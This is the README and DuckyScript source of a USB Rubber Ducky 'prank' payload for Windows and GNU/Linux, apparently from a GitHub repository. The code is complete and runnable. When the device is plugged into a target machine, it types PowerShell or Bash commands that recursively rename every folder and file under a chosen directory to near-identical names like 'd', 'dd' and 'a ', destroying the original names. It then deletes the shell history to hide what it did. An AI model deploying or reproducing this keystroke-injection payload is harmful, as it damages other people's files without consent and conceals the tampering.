> What it looks like instead if you turn on the extension view.
# Index
1. [Features](#features)
2. [Payload Structure](#payload-structure)
- [Conditional Target OS Execution](#conditional-target-os-execution)
- [PowerShell (Windows)](#powershell-windows)
- [Bash (GNU/Linux)](#bash-gnulinux)
3. [How to Use](#how-to-use)
4. [Why not MacOS?](#why-not-macos)
5. [Notes](#notes)
6. [Credits](#credits)
## Features
- **Cross-platform support**: The script can be executed on either **Windows** or **GNU/Linux** systems, based on the defined conditions, unfortunately it could not be published for macOS as well, [read more](#why-not-macos).
- **Recursive renaming**: It renames all directories and files inside a given directory, iterating through subdirectories.
- **Customizable**: Users can modify the base directory path and rename pattern as needed.
## Payload Structure
### Conditional Target OS Execution
The script detects (*from the DEFINE*) the target OS and adapts to either **Windows** or **GNU/Linux**:
- If the target system is **Windows**, the script will execute a PowerShell script.
- If the target system is **Linux**, it will execute a Bash script.
### PowerShell (Windows)
For **Windows** systems, the script:
- Opens **PowerShell** and runs the `Rename-Directories` and `Rename-Files` functions.
- It renames directories by assigning sequential names like `d`, `dd`, etc., and files with names like `a`, `a `, `a `, followed by their respective file extensions.
### Bash (GNU/Linux)
For **GNU/Linux** systems, the script:
- Opens a terminal and executes two Bash functions: `rename_directories` and `rename_files`.
- It performs similar renaming of directories and files, using `mv` to rename them with sequential names (like `d`, `dd`, etc... or `a`, `a `, `a ` etc...).
## How to Use
1. **Edit Definitions (*not mandatory, Windows by default*)**: Adjust the following definitions in the script according to your environment:
- `DEFINE #TARGET_WINDOWS TRUE`: Leave **#TARGET_WINDOWS** to **TRUE** if the script will run on a Windows system.
- `DEFINE #TARGET_GNU_LINUX FALSE`: Set **TARGET_LINUX** to **TRUE** if the script will run on a GNU/Linux system.
- Ufortunately it could not be published for macOS as well, [read more](#why-not-macos).
- `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`: Specify the base directory where the renaming operation should occur, the default is `.` so the default route of Powershell and Bash.
Consider that the main route for Windows generally is `C:\Users\Username\` while for GNU/Linux systems it is something like `/home/username/` but in both cases if for istance you add `./Desktop/Hello/World/` you will go to the World folder in the path `C:\Users\Username\Desktop\Hello\World\` for Windows systems and `/home/username/Desktop/Hello/World/`.
Of course, you have to make sure that this folder exists....
![Windows command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/3.png?raw=true)
> How Windows response to the command `cd ./Desktop/Hello/World/`
![Ubuntu command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/4.png?raw=true)
> How Ubuntu response to the command `cd ./Desktop/Hello/World/`
Consider the maximum length of file names on both Windows and GNU/Linux:
- [Limit on file name length in bash \[closed\]](https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash)
|=> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
- [On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)](https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap)
|=> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
2. **Load Payload**: Upload the script to a USB Rubber Ducky device using the **DuckEncoder**.
3. **Execute Payload**: Insert the USB Rubber Ducky into the target machine.
## Why not MacOS?
I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
If I could know the behavior of this script on macOS (*which probably remains completely unchanged from use on GNU/Linux systems*) it could be optimized in that it could be reduced to a **WINDOWS_PASSIVE_DETECT** where if it is not Windows (*so generally GNU/Linux or macOS systems*) the bash script may be fine.
## Notes
- Ensure that the specified directories exist on the target machine.
- Use with caution on sensitive systems, as the renaming process is recursive and may affect large directories.
- Contributions to add support for macOS are welcome.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,222 @@
REM_BLOCK
#############################################
# #
# Title : Same File Name Prank #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11; GNU/Linux #
# #
#############################################
END_REM
REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
REM %%%%% DEFINE-SECTION %%%%%
REM_BLOCK
Consider that the main route for Windows generally is “C:\Users\Username\” while for GNU/Linux systems it is something like “/home/username/” but in both cases if for example you add “./Desktop/Hello/World/” you will go to the World folder in the path “C:\Users\Username\Desktop\Hello\World\” for Windows systems and “/home/username/Desktop/Hello/World/” for **GNU/Linux** systems.
Of course, you have to make sure that this folder exists....
Payload Settings:
#DIRECTORY_WHERE_TO_RUN_THE_COMMAND - If you feel it is appropriate to run this script within a specific folder you will just need to change this definition.
Consider the maximum length of file names on both Windows and GNU/Linux:
- Limit on file name length in bash [closed]
|-> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
- On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)
|-> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
END_REM
DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND .
REM Set TARGET_WINDOWS to TRUE if the script will run on a Windows system.
REM Set TARGET_LINUX to TRUE if the script will run on a GNU/Linux system.
DEFINE #TARGET_WINDOWS TRUE
DEFINE #TARGET_GNU_LINUX FALSE
REM %%%%% PAYLOAD-SECTION %%%%%
IF (( #TARGET_WINDOWS == TRUE) && (#TARGET_GNU_LINUX == FALSE)) THEN
REM %%%%% WINDOWS CODE %%%%%
REM_BLOCK
Credits: Hak5 LLC
Website: https://hak5.org/
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN_POWERSHELL
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
function Rename-Directories {
param (
[string]$path,
[ref]$counter
)
$folders = Get-ChildItem -Path $path -Directory -Recurse | Sort-Object FullName -Descending
foreach ($folder in $folders) {
$newFolderName = "d" * $counter.Value # Crea il nuovo nome della cartella
$newFolderPath = $newFolderName
$counter.Value++
Rename-Item -Path $folder.FullName -NewName $newFolderPath
Write-Host "Rinominata cartella: $($folder.FullName) -> $($newFolderPath)"
}
}
function Rename-Files {
param (
[string]$path,
[ref]$counter
)
$files = Get-ChildItem -Path $path -File -Recurse
foreach ($file in $files) {
$newFileName = "a" + " " * $counter.Value # Crea il nuovo nome del file
$newFilePath = "$newFileName" + $file.Extension
$counter.Value++
Rename-Item -Path $file.FullName -NewName $newFilePath
}
}
$counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); $counter = 1; Rename-Files -path $basePath -counter ([ref]$counter); Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
END_STRINGLN
ELSE IF (( #TARGET_WINDOWS == FALSE) && (#TARGET_GNU_LINUX == TRUE)) THEN
REM %%%%% GNU/LINUX CODE %%%%%
REM_BLOCK
Credits: Hak5 LLC
Website: https://hak5.org/
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/detect_ready.txt
END_REM
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 1000
STRINGLN_BASH
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
rename_directories() {
local path=$1
local counter=$2
directories=$(find "$path" -type d | sort -r)
for dir in $directories; do
new_folder_name=$(printf 'd%.0s' $(seq 1 "$counter")) # Crea il nuovo nome della cartella
new_folder_path="$path/$new_folder_name"
counter=$((counter + 1))
mv "$dir" "$new_folder_path"
done
}
rename_files() {
local path=$1
local counter=$2
files=$(find "$path" -type f)
for file in $files; do
extension="${file##*.}"
new_file_name="a$(printf ' %.0s' $(seq 1 "$counter"))"
new_file_path="$(dirname "$file")/$new_file_name"
if [[ "$extension" != "$file" ]]; then
new_file_path="$new_file_path.$extension"
fi
counter=$((counter + 1))
mv "$file" "$new_file_path"
done
}
counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit
END_STRINGLN
END_IF